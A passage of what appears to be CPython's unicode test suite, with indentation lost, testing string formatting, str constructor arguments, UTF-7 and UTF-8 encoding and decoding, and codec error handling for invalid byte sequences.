# Testing Unicode formatting strings...
self.assertEqual("%s, %s" % (Str.ABC, Str.ABC),
'Str.ABC, Str.ABC')
self.assertEqual("%s, %s, %d, %i, %u, %f, %5.2f" %
(Str.ABC, Str.ABC,
Int.IDES, Int.IDES, Int.IDES,
Float.PI, Float.PI),
'Str.ABC, Str.ABC, 15, 15, 15, 3.141593, 3.14')
# formatting jobs delegated from the string implementation:
self.assertEqual('...%(foo)s...' % {'foo':Str.ABC},
'...Str.ABC...')
self.assertEqual('...%(foo)s...' % {'foo':Int.IDES},
'...Int.IDES...')
self.assertEqual('...%(foo)i...' % {'foo':Int.IDES},
'...15...')
self.assertEqual('...%(foo)d...' % {'foo':Int.IDES},
'...15...')
self.assertEqual('...%(foo)u...' % {'foo':Int.IDES, 'def':Float.PI},
'...15...')
self.assertEqual('...%(foo)f...' % {'foo':Float.PI,'def':123},
'...3.141593...')
def test_formatting_huge_precision(self):
format_string = "%.{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string % 2.34
def test_issue28598_strsubclass_rhs(self):
# A subclass of str with an __rmod__ method should be able to hook
# into the % operator
class SubclassedStr(str):
def __rmod__(self, other):
return 'Success, self.__rmod__({!r}) was called'.format(other)
self.assertEqual('lhs %% %r' % SubclassedStr('rhs'),
"Success, self.__rmod__('lhs %% %r') was called")
@support.cpython_only
def test_formatting_huge_precision_c_limits(self):
from _testcapi import INT_MAX
format_string = "%.{}f".format(INT_MAX + 1)
with self.assertRaises(ValueError):
result = format_string % 2.34
def test_formatting_huge_width(self):
format_string = "%{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string % 2.34
def test_startswith_endswith_errors(self):
for meth in ('foo'.startswith, 'foo'.endswith):
with self.assertRaises(TypeError) as cm:
meth(['f'])
exc = str(cm.exception)
self.assertIn('str', exc)
self.assertIn('tuple', exc)
@support.run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_format_float(self):
# should not format with a comma, but always with C locale
self.assertEqual('1.0', '%.1f' % 1.0)
def test_constructor(self):
# unicode(obj) tests (this maps to PyObject_Unicode() at C level)
self.assertEqual(
str('unicode remains unicode'),
'unicode remains unicode'
)
for text in ('ascii', '\xe9', '\u20ac', '\U0010FFFF'):
subclass = StrSubclass(text)
self.assertEqual(str(subclass), text)
self.assertEqual(len(subclass), len(text))
if text == 'ascii':
self.assertEqual(subclass.encode('ascii'), b'ascii')
self.assertEqual(subclass.encode('utf-8'), b'ascii')
self.assertEqual(
str('strings are converted to unicode'),
'strings are converted to unicode'
)
class StringCompat:
def __init__(self, x):
self.x = x
def __str__(self):
return self.x
self.assertEqual(
str(StringCompat('__str__ compatible objects are recognized')),
'__str__ compatible objects are recognized'
)
# unicode(obj) is compatible to str():
o = StringCompat('unicode(obj) is compatible to str()')
self.assertEqual(str(o), 'unicode(obj) is compatible to str()')
self.assertEqual(str(o), 'unicode(obj) is compatible to str()')
for obj in (123, 123.45, 123):
self.assertEqual(str(obj), str(str(obj)))
# unicode(obj, encoding, error) tests (this maps to
# PyUnicode_FromEncodedObject() at C level)
if not sys.platform.startswith('java'):
self.assertRaises(
TypeError,
str,
'decoding unicode is not supported',
'utf-8',
'strict'
)
self.assertEqual(
str(b'strings are decoded to unicode', 'utf-8', 'strict'),
'strings are decoded to unicode'
)
if not sys.platform.startswith('java'):
self.assertEqual(
str(
memoryview(b'character buffers are decoded to unicode'),
'utf-8',
'strict'
),
'character buffers are decoded to unicode'
)
self.assertRaises(TypeError, str, 42, 42, 42)
def test_constructor_keyword_args(self):
"""Pass various keyword argument combinations to the constructor."""
# The object argument can be passed as a keyword.
self.assertEqual(str(object='foo'), 'foo')
self.assertEqual(str(object=b'foo', encoding='utf-8'), 'foo')
# The errors argument without encoding triggers "decode" mode.
self.assertEqual(str(b'foo', errors='strict'), 'foo') # not "b'foo'"
self.assertEqual(str(object=b'foo', errors='strict'), 'foo')
def test_constructor_defaults(self):
"""Check the constructor argument defaults."""
# The object argument defaults to '' or b''.
self.assertEqual(str(), '')
self.assertEqual(str(errors='strict'), '')
utf8_cent = '¢'.encode('utf-8')
# The encoding argument defaults to utf-8.
self.assertEqual(str(utf8_cent, errors='strict'), '¢')
# The errors argument defaults to strict.
self.assertRaises(UnicodeDecodeError, str, utf8_cent, encoding='ascii')
def test_codecs_utf7(self):
utfTests = [
('A\u2262\u0391.', b'A+ImIDkQ.'), # RFC2152 example
('Hi Mom -\u263a-!', b'Hi Mom -+Jjo--!'), # RFC2152 example
('\u65E5\u672C\u8A9E', b'+ZeVnLIqe-'), # RFC2152 example
('Item 3 is \u00a31.', b'Item 3 is +AKM-1.'), # RFC2152 example
('+', b'+-'),
('+-', b'+--'),
('+?', b'+-?'),
(r'\?', b'+AFw?'),
('+?', b'+-?'),
(r'\\?', b'+AFwAXA?'),
(r'\\\?', b'+AFwAXABc?'),
(r'++--', b'+-+---'),
('\U000abcde', b'+2m/c3g-'), # surrogate pairs
('/', b'/'),
]
for (x, y) in utfTests:
self.assertEqual(x.encode('utf-7'), y)
# Unpaired surrogates are passed through
self.assertEqual('\uD801'.encode('utf-7'), b'+2AE-')
self.assertEqual('\uD801x'.encode('utf-7'), b'+2AE-x')
self.assertEqual('\uDC01'.encode('utf-7'), b'+3AE-')
self.assertEqual('\uDC01x'.encode('utf-7'), b'+3AE-x')
self.assertEqual(b'+2AE-'.decode('utf-7'), '\uD801')
self.assertEqual(b'+2AE-x'.decode('utf-7'), '\uD801x')
self.assertEqual(b'+3AE-'.decode('utf-7'), '\uDC01')
self.assertEqual(b'+3AE-x'.decode('utf-7'), '\uDC01x')
self.assertEqual('\uD801\U000abcde'.encode('utf-7'), b'+2AHab9ze-')
self.assertEqual(b'+2AHab9ze-'.decode('utf-7'), '\uD801\U000abcde')
# Issue #2242: crash on some Windows/MSVC versions
self.assertEqual(b'+\xc1'.decode('utf-7', 'ignore'), '')
# Direct encoded characters
set_d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'(),-./:?"
# Optional direct characters
set_o = '!"#$%&*;<=>@[]^_`{|}'
for c in set_d:
self.assertEqual(c.encode('utf7'), c.encode('ascii'))
self.assertEqual(c.encode('ascii').decode('utf7'), c)
for c in set_o:
self.assertEqual(c.encode('ascii').decode('utf7'), c)
def test_codecs_utf8(self):
self.assertEqual(''.encode('utf-8'), b'')
self.assertEqual('\u20ac'.encode('utf-8'), b'\xe2\x82\xac')
self.assertEqual('\U00010002'.encode('utf-8'), b'\xf0\x90\x80\x82')
self.assertEqual('\U00023456'.encode('utf-8'), b'\xf0\xa3\x91\x96')
self.assertEqual('\ud800'.encode('utf-8', 'surrogatepass'), b'\xed\xa0\x80')
self.assertEqual('\udc00'.encode('utf-8', 'surrogatepass'), b'\xed\xb0\x80')
self.assertEqual(('\U00010002'*10).encode('utf-8'),
b'\xf0\x90\x80\x82'*10)
self.assertEqual(
'\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f'
'\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00'
'\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c'
'\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067'
'\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das'
' Nunstuck git und'.encode('utf-8'),
b'\xe6\xad\xa3\xe7\xa2\xba\xe3\x81\xab\xe8\xa8\x80\xe3\x81'
b'\x86\xe3\x81\xa8\xe7\xbf\xbb\xe8\xa8\xb3\xe3\x81\xaf\xe3'
b'\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe'
b'\xe3\x81\x9b\xe3\x82\x93\xe3\x80\x82\xe4\xb8\x80\xe9\x83'
b'\xa8\xe3\x81\xaf\xe3\x83\x89\xe3\x82\xa4\xe3\x83\x84\xe8'
b'\xaa\x9e\xe3\x81\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81'
b'\xe3\x81\x82\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\xa7\xe3\x81'
b'\x9f\xe3\x82\x89\xe3\x82\x81\xe3\x81\xa7\xe3\x81\x99\xe3'
b'\x80\x82\xe5\xae\x9f\xe9\x9a\x9b\xe3\x81\xab\xe3\x81\xaf'
b'\xe3\x80\x8cWenn ist das Nunstuck git und'
)
# UTF-8 specific decoding tests
self.assertEqual(str(b'\xf0\xa3\x91\x96', 'utf-8'), '\U00023456' )
self.assertEqual(str(b'\xf0\x90\x80\x82', 'utf-8'), '\U00010002' )
self.assertEqual(str(b'\xe2\x82\xac', 'utf-8'), '\u20ac' )
# Other possible utf-8 test cases:
# * strict decoding testing for all of the
# UTF8_ERROR cases in PyUnicode_DecodeUTF8
def test_utf8_decode_valid_sequences(self):
sequences = [
# single byte
(b'\x00', '\x00'), (b'a', 'a'), (b'\x7f', '\x7f'),
# 2 bytes
(b'\xc2\x80', '\x80'), (b'\xdf\xbf', '\u07ff'),
# 3 bytes
(b'\xe0\xa0\x80', '\u0800'), (b'\xed\x9f\xbf', '\ud7ff'),
(b'\xee\x80\x80', '\uE000'), (b'\xef\xbf\xbf', '\uffff'),
# 4 bytes
(b'\xF0\x90\x80\x80', '\U00010000'),
(b'\xf4\x8f\xbf\xbf', '\U0010FFFF')
]
for seq, res in sequences:
self.assertEqual(seq.decode('utf-8'), res)
def test_utf8_decode_invalid_sequences(self):
# continuation bytes in a sequence of 2, 3, or 4 bytes
continuation_bytes = [bytes([x]) for x in range(0x80, 0xC0)]
# start bytes of a 2-byte sequence equivalent to code points < 0x7F
invalid_2B_seq_start_bytes = [bytes([x]) for x in range(0xC0, 0xC2)]
# start bytes of a 4-byte sequence equivalent to code points > 0x10FFFF
invalid_4B_seq_start_bytes = [bytes([x]) for x in range(0xF5, 0xF8)]
invalid_start_bytes = (
continuation_bytes + invalid_2B_seq_start_bytes +
invalid_4B_seq_start_bytes + [bytes([x]) for x in range(0xF7, 0x100)]
)
for byte in invalid_start_bytes:
self.assertRaises(UnicodeDecodeError, byte.decode, 'utf-8')
for sb in invalid_2B_seq_start_bytes:
for cb in continuation_bytes:
self.assertRaises(UnicodeDecodeError, (sb+cb).decode, 'utf-8')
for sb in invalid_4B_seq_start_bytes:
for cb1 in continuation_bytes[:3]:
for cb3 in continuation_bytes[:3]:
self.assertRaises(UnicodeDecodeError,
(sb+cb1+b'\x80'+cb3).decode, 'utf-8')
for cb in [bytes([x]) for x in range(0x80, 0xA0)]:
self.assertRaises(UnicodeDecodeError,
(b'\xE0'+cb+b'\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xE0'+cb+b'\xBF').decode, 'utf-8')
# surrogates
for cb in [bytes([x]) for x in range(0xA0, 0xC0)]:
self.assertRaises(UnicodeDecodeError,
(b'\xED'+cb+b'\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xED'+cb+b'\xBF').decode, 'utf-8')
for cb in [bytes([x]) for x in range(0x80, 0x90)]:
self.assertRaises(UnicodeDecodeError,
(b'\xF0'+cb+b'\x80\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xF0'+cb+b'\xBF\xBF').decode, 'utf-8')
for cb in [bytes([x]) for x in range(0x90, 0xC0)]:
self.assertRaises(UnicodeDecodeError,
(b'\xF4'+cb+b'\x80\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xF4'+cb+b'\xBF\xBF').decode, 'utf-8')
def test_issue8271(self):
# Issue #8271: during the decoding of an invalid UTF-8 byte sequence,
# only the start byte and the continuation byte(s) are now considered
# invalid, instead of the number of bytes specified by the start byte.
# See http://www.unicode.org/versions/Unicode5.2.0/ch03.pdf (page 95,
# table 3-8, Row 2) for more information about the algorithm used.
FFFD = '\ufffd'
sequences = [
# invalid start bytes
(b'\x80', FFFD), # continuation byte
(b'\x80\x80', FFFD*2), # 2 continuation bytes
(b'\xc0', FFFD),
(b'\xc0\xc0', FFFD*2),
(b'\xc1', FFFD),
(b'\xc1\xc0', FFFD*2),
(b'\xc0\xc1', FFFD*2),
# with start byte of a 2-byte sequence
(b'\xc2', FFFD), # only the start byte
(b'\xc2\xc2', FFFD*2), # 2 start bytes
(b'\xc2\xc2\xc2', FFFD*3), # 3 start bytes
(b'\xc2\x41', FFFD+'A'), # invalid continuation byte
# with start byte of a 3-byte sequence
(b'\xe1', FFFD), # only the start byte
(b'\xe1\xe1', FFFD*2), # 2 start bytes
(b'\xe1\xe1\xe1', FFFD*3), # 3 start bytes
(b'\xe1\xe1\xe1\xe1', FFFD*4), # 4 start bytes
(b'\xe1\x80', FFFD), # only 1 continuation byte
(b'\xe1\x41', FFFD+'A'), # invalid continuation byte
(b'\xe1\x41\x80', FFFD+'A'+FFFD), # invalid cb followed by valid cb
(b'\xe1\x41\x41', FFFD+'AA'), # 2 invalid continuation bytes
(b'\xe1\x80\x41', FFFD+'A'), # only 1 valid continuation byte
(b'\xe1\x80\xe1\x41', FFFD*2+'A'), # 1 valid and the other invalid
(b'\xe1\x41\xe1\x80', FFFD+'A'+FFFD), # 1 invalid and the other valid
# with start byte of a 4-byte sequence
(b'\xf1', FFFD), # only the start byte
(b'\xf1\xf1', FFFD*2), # 2 start bytes
(b'\xf1\xf1\xf1', FFFD*3), # 3 start bytes
(b'\xf1\xf1\xf1\xf1', FFFD*4), # 4 start bytes
(b'\xf1\xf1\xf1\xf1\xf1', FFFD*5), # 5 start bytes
(b'\xf1\x80', FFFD), # only 1 continuation bytes
(b'\xf1\x80\x80', FFFD), # only 2 continuation bytes
(b'\xf1\x80\x41', FFFD+'A'), # 1 valid cb and 1 invalid
(b'\xf1\x80\x41\x41', FFFD+'AA'), # 1 valid cb and 1 invalid
(b'\xf1\x80\x80\x41', FFFD+'A'), # 2 valid cb and 1 invalid
(b'\xf1\x41\x80', FFFD+'A'+FFFD), # 1 invalid cv and 1 valid
(b'\xf1\x41\x80\x80', FFFD+'A'+FFFD*2), # 1 invalid cb and 2 invalid
(b'\xf1\x41\x80\x41', FFFD+'A'+FFFD+'A'), # 2 invalid cb and 1 invalid
(b'\xf1\x41\x41\x80', FFFD+'AA'+FFFD), # 1 valid cb and 1 invalid
(b'\xf1\x41\xf1\x80', FFFD+'A'+FFFD),
(b'\xf1\x41\x80\xf1', FFFD+'A'+FFFD*2),
(b'\xf1\xf1\x80\x41', FFFD*2+'A'),
(b'\xf1\x41\xf1\xf1', FFFD+'A'+FFFD*2),
# with invalid start byte of a 4-byte sequence (rfc2279)
(b'\xf5', FFFD), # only the start byte
(b'\xf5\xf5', FFFD*2), # 2 start bytes
(b'\xf5\x80', FFFD*2), # only 1 continuation byte
(b'\xf5\x80\x80', FFFD*3), # only 2 continuation byte
(b'\xf5\x80\x80\x80', FFFD*4), # 3 continuation bytes
(b'\xf5\x80\x41', FFFD*2+'A'), # 1 valid cb and 1 invalid
(b'\xf5\x80\x41\xf5', FFFD*2+'A'+FFFD),
(b'\xf5\x41\x80\x80\x41', FFFD+'A'+FFFD*2+'A'),
# with invalid start byte of a 5-byte sequence (rfc2279)
(b'\xf8', FFFD), # only the start byte
(b'\xf8\xf8', FFFD*2), # 2 start bytes
(b'\xf8\x80', FFFD*2), # only one continuation byte
(b'\xf8\x80\x41', FFFD*2 + 'A'), # 1 valid cb and 1 invalid
(b'\xf8\x80\x80\x80\x80', FFFD*5), # invalid 5 bytes seq with 5 bytes
# with invalid start byte of a 6-byte sequence (rfc2279)
(b'\xfc', FFFD), # only the start byte
(b'\xfc\xfc', FFFD*2), # 2 start bytes
(b'\xfc\x80\x80', FFFD*3), # only 2 continuation bytes
(b'\xfc\x80\x80\x80\x80\x80', FFFD*6), # 6 continuation bytes
# invalid start byte
(b'\xfe', FFFD),
(b'\xfe\x80\x80', FFFD*3),
# other sequences
(b'\xf1\x80\x41\x42\x43', '\ufffd\x41\x42\x43'),
(b'\xf1\x80\xff\x42\x43', '\ufffd\ufffd\x42\x43'),
(b'\xf1\x80\xc2\x81\x43', '\ufffd\x81\x43'),
(b'\x61\xF1\x80\x80\xE1\x80\xC2\x62\x80\x63\x80\xBF\x64',
'\x61\uFFFD\uFFFD\uFFFD\x62\uFFFD\x63\uFFFD\uFFFD\x64'),
]
for n, (seq, res) in enumerate(sequences):
self.assertRaises(UnicodeDecodeError, seq.decode, 'utf-8', 'strict')
self.assertEqual(seq.decode('utf-8', 'replace'), res)
self.assertEqual((seq+b'b').decode('utf-8', 'replace'), res+'b')
self.assertEqual(seq.decode('utf-8', 'ignore'),
res.replace('\uFFFD', ''))
def assertCorrectUTF8Decoding(self, seq, res, err):
"""
Check that an invalid UTF-8 sequence raises a UnicodeDecodeError when
'strict' is used, returns res when 'replace' is used, and that doesn't
return anything when 'ignore' is used.
"""
with self.assertRaises(UnicodeDecodeError) as cm:
seq.decode('utf-8')
exc = cm.exception
self.assertIn(err, str(exc))
self.assertEqual(seq.decode('utf-8', 'replace'), res)
self.assertEqual((b'aaaa' + seq + b'bbbb').decode('utf-8', 'replace'),
'aaaa' + res + 'bbbb')
res = res.replace('\ufffd', '')
self.assertEqual(seq.decode('utf-8', 'ignore'), res)
self.assertEqual((b'aaaa' + seq + b'bbbb').decode('utf-8', 'ignore'),
'aaaa' + res + 'bbbb')
def test_invalid_start_byte(self):
"""
Test that an 'invalid start byte' error is raised when the first byte
is not in the ASCII range or is not a valid start byte of a 2-, 3-, or
4-bytes sequence. The invalid start byte is replaced with a single
U+FFFD when errors='replace'.
E.g. <80> is a continuation byte and can appear only after a start byte.
"""
FFFD = '\ufffd'
for byte in b'\x80\xA0\x9F\xBF\xC0\xC1\xF5\xFF':
self.assertCorrectUTF8Decoding(bytes([byte]), '\ufffd',
'invalid start byte')
def test_unexpected_end_of_data(self):
"""
Test that an 'unexpected end of data' error is raised when the string
ends after a start byte of a 2-, 3-, or 4-bytes sequence without having
enough continuation bytes. The incomplete sequence is replaced with a
single U+FFFD when errors='replace'.
E.g. in the sequence <F3 80 80>, F3 is the start byte of a 4-bytes
sequence, but it's followed by only 2 valid continuation bytes and the
last continuation bytes is missing.
Note: the continuation bytes must be all valid, if one of them is
invalid another error will be raised.
"""
sequences = [
'C2', 'DF',
'E0 A0', 'E0 BF', 'E1 80', 'E1 BF', 'EC 80', 'EC BF',
'ED 80', 'ED 9F', 'EE 80', 'EE BF', 'EF 80', 'EF BF',
'F0 90', 'F0 BF', 'F0 90 80', 'F0 90 BF', 'F0 BF 80', 'F0 BF BF',
'F1 80', 'F1 BF', 'F1 80 80', 'F1 80 BF', 'F1 BF 80', 'F1 BF BF',
'F3 80', 'F3 BF', 'F3 80 80', 'F3 80 BF', 'F3 BF 80', 'F3 BF BF',
'F4 80', 'F4 8F', 'F4 80 80', 'F4 80 BF', 'F4 8F 80', 'F4 8F BF'
]
FFFD = '\ufffd'
for seq in sequences:
self.assertCorrectUTF8Decoding(bytes.fromhex(seq), '\ufffd',
'unexpected end of data')
def test_invalid_cb_for_2bytes_seq(self):
"""
Test that an 'invalid continuation byte' error is raised when the
continuation byte of a 2-bytes sequence is invalid. The start byte
is replaced by a single U+FFFD and the second byte is handled
separately when errors='replace'.
E.g. in the sequence <C2 41>, C2 is the start byte of a 2-bytes
sequence, but 41 is not a valid continuation byte because it's the
ASCII letter 'A'.
"""
FFFD = '\ufffd'
FFFDx2 = FFFD * 2
sequences = [
('C2 00', FFFD+'\x00'), ('C2 7F', FFFD+'\x7f'),
('C2 C0', FFFDx2), ('C2 FF', FFFDx2),
('DF 00', FFFD+'\x00'), ('DF 7F', FFFD+'\x7f'),
('DF C0', FFFDx2), ('DF FF', FFFDx2),
]
for seq, res in sequences:
self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
'invalid continuation byte')
def test_invalid_cb_for_3bytes_seq(self):
"""
Test that an 'invalid continuation byte' error is raised when the
continuation byte(s) of a 3-bytes sequence are invalid. When
errors='replace', if the first continuation byte is valid, the first
two bytes (start byte + 1st cb) are replaced by a single U+FFFD and the
third byte is handled separately, otherwise only the start byte is
replaced with a U+FFFD and the other continuation bytes are handled
separately.
E.g. in the sequence <E1 80 41>, E1 is the start byte of a 3-bytes
sequence, 80 is a valid continuation byte, but 41 is not a valid cb
because it's the ASCII letter 'A'.
Note: when the start byte is E0 or ED, the valid ranges for the first
continuation byte are limited to A0..BF and 80..9F respectively.
Python 2 used to consider all the bytes in range 80..BF valid when the
start byte was ED. This is fixed in Python 3.
"""
FFFD = '\ufffd'
FFFDx2 = FFFD * 2
sequences = [
('E0 00', FFFD+'\x00'), ('E0 7F', FFFD+'\x7f'), ('E0 80', FFFDx2),
('E0 9F', FFFDx2), ('E0 C0', FFFDx2), ('E0 FF', FFFDx2),
('E0 A0 00', FFFD+'\x00'), ('E0 A0 7F', FFFD+'\x7f'),
('E0 A0 C0', FFFDx2), ('E0 A0 FF', FFFDx2),
('E0 BF 00', FFFD+'\x00'), ('E0 BF 7F', FFFD+'\x7f'),
('E0 BF C0', FFFDx2), ('E0 BF FF', FFFDx2), ('E1 00', FFFD+'\x00'),
('E1 7F', FFFD+'\x7f'), ('E1 C0', FFFDx2), ('E1 FF', FFFDx2),
('E1 80 00', FFFD+'\x00'), ('E1 80 7F', FFFD+'\x7f'),
('E1 80 C0', FFFDx2), ('E1 80 FF', FFFDx2),
('E1 BF 00', FFFD+'\x00'), ('E1 BF 7F', FFFD+'\x7f'),
('E1 BF C0', FFFDx2), ('E1 BF FF', FFFDx2), ('EC 00', FFFD+'\x00'),
('EC 7F', FFFD+'\x7f'), ('EC C0', FFFDx2), ('EC FF', FFFDx2),
('EC 80 00', FFFD+'\x00'), ('EC 80 7F', FFFD+'\x7f'),
('EC 80 C0', FFFDx2), ('EC 80 FF', FFFDx2),
('EC BF 00', FFFD+'\x00'), ('EC BF 7F', FFFD+'\x7f'),
('EC BF C0', FFFDx2), ('EC BF FF', FFFDx2), ('ED 00', FFFD+'\x00'),
('ED 7F', FFFD+'\x7f'),
('ED A0', FFFDx2), ('ED BF', FFFDx2), # see note ^
('ED C0', FFFDx2), ('ED FF', FFFDx2), ('ED 80 00', FFFD+'\x00'),
('ED 80 7F', FFFD+'\x7f'), ('ED 80 C0', FFFDx2),
('ED 80 FF', FFFDx2), ('ED 9F 00', FFFD+'\x00'),
('ED 9F 7F', FFFD+'\x7f'), ('ED 9F C0', FFFDx2),
('ED 9F FF', FFFDx2), ('EE 00', FFFD+'\x00'),
('EE 7F', FFFD+'\x7f'), ('EE C0', FFFDx2), ('EE FF', FFFDx2),
('EE 80 00', FFFD+'\x00'), ('EE 80 7F', FFFD+'\x7f'),
('EE 80 C0', FFFDx2), ('EE 80 FF', FFFDx2),
('EE BF 00', FFFD+'\x00'), ('EE BF 7F', FFFD+'\x7f'),
('EE BF C0', FFFDx2), ('EE BF FF', FFFDx2), ('EF 00', FFFD+'\x00'),
('EF 7F', FFFD+'\x7f'), ('EF C0', FFFDx2), ('EF FF', FFFDx2),
('EF 80 00', FFFD+'\x00'), ('EF 80 7F', FFFD+'\x7f'),
('EF 80 C0', FFFDx2), ('EF 80 FF', FFFDx2),
('EF BF 00', FFFD+'\x00'), ('EF BF 7F', FFFD+'\x7f'),
('EF BF C0', FFFDx2), ('EF BF FF', FFFDx2),
]
for seq, res in sequences:
self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
'invalid continuation byte')
def test_invalid_cb_for_4bytes_seq(self):
"""
Test that an 'invalid continuation byte' error is raised when the
continuation byte(s) of a 4-bytes sequence are invalid. When
errors='replace',the start byte and all the following valid
continuation bytes are replaced with a single U+FFFD, and all the bytes
starting from the first invalid continuation bytes (included) are
handled separately.
E.g. in the sequence <E1 80 41>, E1 is the start byte of a 3-bytes
sequence, 80 is a valid continuation byte, but 41 is not a valid cb
because it's the ASCII letter 'A'.
Note: when the start byte is E0 or ED, the valid ranges for the first
continuation byte are limited to A0..BF and 80..9F respectively.
However, when the start byte is ED, Python 2 considers all the bytes
in range 80..BF valid. This is fixed in Python 3.
"""
FFFD = '\ufffd'
FFFDx2 = FFFD * 2
sequences = [
('F0 00', FFFD+'\x00'), ('F0 7F', FFFD+'\x7f'), ('F0 80', FFFDx2),
('F0 8F', FFFDx2), ('F0 C0', FFFDx2), ('F0 FF', FFFDx2),
('F0 90 00', FFFD+'\x00'), ('F0 90 7F', FFFD+'\x7f'),
('F0 90 C0', FFFDx2), ('F0 90 FF', FFFDx2),
('F0 BF 00', FFFD+'\x00'), ('F0 BF 7F', FFFD+'\x7f'),
('F0 BF C0', FFFDx2), ('F0 BF FF', FFFDx2),
('F0 90 80 00', FFFD+'\x00'), ('F0 90 80 7F', FFFD+'\x7f'),
('F0 90 80 C0', FFFDx2), ('F0 90 80 FF', FFFDx2),
('F0 90 BF 00', FFFD+'\x00'), ('F0 90 BF 7F', FFFD+'\x7f'),
('F0 90 BF C0', FFFDx2), ('F0 90 BF FF', FFFDx2),
('F0 BF 80 00', FFFD+'\x00'), ('F0 BF 80 7F', FFFD+'\x7f'),
('F0 BF 80 C0', FFFDx2), ('F0 BF 80 FF', FFFDx2),
('F0 BF BF 00', FFFD+'\x00'), ('F0 BF BF 7F', FFFD+'\x7f'),
('F0 BF BF C0', FFFDx2), ('F0 BF BF FF', FFFDx2),
('F1 00', FFFD+'\x00'), ('F1 7F', FFFD+'\x7f'), ('F1 C0', FFFDx2),
('F1 FF', FFFDx2), ('F1 80 00', FFFD+'\x00'),
('F1 80 7F', FFFD+'\x7f'), ('F1 80 C0', FFFDx2),
('F1 80 FF', FFFDx2), ('F1 BF 00', FFFD+'\x00'),
('F1 BF 7F', FFFD+'\x7f'), ('F1 BF C0', FFFDx2),
('F1 BF FF', FFFDx2), ('F1 80 80 00', FFFD+'\x00'),
('F1 80 80 7F', FFFD+'\x7f'), ('F1 80 80 C0', FFFDx2),
('F1 80 80 FF', FFFDx2), ('F1 80 BF 00', FFFD+'\x00'),
('F1 80 BF 7F', FFFD+'\x7f'), ('F1 80 BF C0', FFFDx2),
('F1 80 BF FF', FFFDx2), ('F1 BF 80 00', FFFD+'\x00'),
('F1 BF 80 7F', FFFD+'\x7f'), ('F1 BF 80 C0', FFFDx2),
('F1 BF 80 FF', FFFDx2), ('F1 BF BF 00', FFFD+'\x00'),
('F1 BF BF 7F', FFFD+'\x7f'), ('F1 BF BF C0', FFFDx2),
('F1 BF BF FF', FFFDx2), ('F3 00', FFFD+'\x00'),
('F3 7F', FFFD+'\x7f'), ('F3 C0', FFFDx2), ('F3 FF', FFFDx2),
('F3 80 00', FFFD+'\x00'), ('F3 80 7F', FFFD+'\x7f'),
('F3 80 C0', FFFDx2), ('F3 80 FF', FFFDx2),
('F3 BF 00', FFFD+'\x00'), ('F3 BF 7F', FFFD+'\x7f'),
('F3 BF C0', FFFDx2), ('F3 BF FF', FFFDx2),
('F3 80 80 00', FFFD+'\x00'), ('F3 80 80 7F', FFFD+'\x7f'),
('F3 80 80 C0', FFFDx2), ('F3 80 80 FF', FFFDx2),
('F3 80 BF 00', FFFD+'\x00'), ('F3 80 BF 7F', FFFD+'\x7f'),
('F3 80 BF C0', FFFDx2), ('F3 80 BF FF', FFFDx2),
('F3 BF 80 00', FFFD+'\x00'), ('F3 BF 80 7F', FFFD+'\x7f'),
('F3 BF 80 C0', FFFDx2), ('F3 BF 80 FF', FFFDx2),
('F3 BF BF 00', FFFD+'\x00'), ('F3 BF BF 7F', FFFD+'\x7f'),
('F3 BF BF C0', FFFDx2), ('F3 BF BF FF', FFFDx2),
('F4 00', FFFD+'\x00'), ('F4 7F', FFFD+'\x7f'), ('F4 90', FFFDx2),
('F4 BF', FFFDx2), ('F4 C0', FFFDx2), ('F4 FF', FFFDx2),
('F4 80 00', FFFD+'\x00'), ('F4 80 7F', FFFD+'\x7f'),
('F4 80 C0', FFFDx2), ('F4 80 FF', FFFDx2),
('F4 8F 00', FFFD+'\x00'), ('F4 8F 7F', FFFD+'\x7f'),
('F4 8F C0', FFFDx2), ('F4 8F FF', FFFDx2),
('F4 80 80 00', FFFD+'\x00'), ('F4 80 80 7F', FFFD+'\x7f'),
('F4 80 80 C0', FFFDx2), ('F4 80 80 FF', FFFDx2),
('F4 80 BF 00', FFFD+'\x00'), ('F4 80 BF 7F', FFFD+'\x7f'),
('F4 80 BF C0', FFFDx2), ('F4 80 BF FF', FFFDx2),
('F4 8F 80 00', FFFD+'\x00'), ('F4 8F 80 7F', FFFD+'\x7f'),
('F4 8F 80 C0', FFFDx2), ('F4 8F 80 FF', FFFDx2),
('F4 8F BF 00', FFFD+'\x00'), ('F4 8F BF 7F', FFFD+'\x7f'),
('F4 8F BF C0', FFFDx2), ('F4 8F BF FF', FFFDx2)
]
for seq, res in sequences:
self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
'invalid continuation byte')
def test_codecs_idna(self):
# Test whether trailing dot is preserved
self.assertEqual("www.python.org.".encode("idna"), b"www.python.org.")
def test_codecs_errors(self):
# Error handling (encoding)
self.assertRaises(UnicodeError, 'Andr\202 x'.encode, 'ascii')
self.assertRaises(UnicodeError, 'Andr\202 x'.encode, 'ascii','strict')
self.assertEqual('Andr\202 x'.encode('ascii','ignore'), b"Andr x")
self.assertEqual('Andr\202 x'.encode('ascii','replace'), b"Andr? x")
self.assertEqual('Andr\202 x'.encode('ascii', 'replace'),
'Andr\202 x'.encode('ascii', errors='replace'))
self.assertEqual('Andr\202 x'.encode('ascii', 'ignore'),
'Andr\202 x'.encode(encoding='ascii', errors='ignore'))
# Error handling (decoding)
self.assertRaises(UnicodeError, str, b'Andr\202 x', 'ascii')
self.assertRaises(UnicodeError, str, b'Andr\202 x', 'ascii', 'strict')
